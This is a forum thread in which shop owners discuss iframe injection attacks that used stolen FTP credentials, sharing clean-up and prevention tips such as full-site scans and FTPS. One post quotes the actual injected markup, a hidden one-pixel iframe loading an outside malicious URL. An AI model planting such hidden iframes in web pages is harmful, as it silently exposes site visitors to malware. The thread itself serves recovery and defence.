Re: Warning: Iframe based attacks using stolen FTP access info
 

We haven't had an iFrame incident since this issue back in December. Was everything secured and updated on the server levels? Have you scanned the server and contacted those users that were infected and told them to update their software?

Re: Warning: Iframe based attacks using stolen FTP access info
 

I am somewhat hesitant to say my problem is solved but my hacker hasn't been back in a couple of months. I believe my hacker was gaining access through my shared server. I moved to hands-on and so far so good. Blue+cheap=hacked?

Re: Warning: Iframe based attacks using stolen FTP access info
 

Sorry to break the "silence" but our site was hacked (iframe) on 05/12/2009!

I have cleaned/replaced the index.php files, home.php files, etc. that have the line of code in them..

However, if you go into any page of the site (including admin pages) and click to view the source code.. the iframe link still exists

<p /><iframe src="http://brugeni.net/?click=313114" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>


I've read through this entire thread and if any one have any idea what's causing this? Please let me know. Thanks for your help! :?

Re: Warning: Iframe based attacks using stolen FTP access info
 

That means there is an iframe still in your code somewhere - you need to look through ALL of your files, as there are quite a number that are usually injected. Your host can help with this, as they have tools to scan your entire site quickly.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Thanks for the reply. I have Hands-on doing a scan.. we'll see what the results are

Any thoughts on how to prevent another attack?

Thanks

Re: Warning: Iframe based attacks using stolen FTP access info
 

Also clear your browser cache and run cleanup.php - you may be looking at files complied before you cleaned up.
Hands-on was very responsive when I got hit with this - so it is good you are there. They also helped me to correctly set up ftps, just in case insecure ftp has something to do with this attack.

Re: Warning: Iframe based attacks using stolen FTP access info
 

read this

Re: Warning: Iframe based attacks using stolen FTP access info
 

Also, I have seen Iframe attacks be encoded in HEX. So you may not be able to look for "iframe" per say in the templates.

It could be a bunch of Hex equivalent characters.

Good luck!

Thanks,

Carrie

Re: Warning: Iframe based attacks using stolen FTP access info
 

In recent days we've been seeing the HEX add too.. instaed of a regular iframe injection, there's document.write being used in the script portion and everything in there is encoded.

Makes it a little harder to SEE what's an issue, but the injections still appear to be going at the bottom of files, so they're still easy enough to spot.

Re: Warning: Iframe based attacks using stolen FTP access info
 

Are these recent attacks still going through FTP with the correct username and password?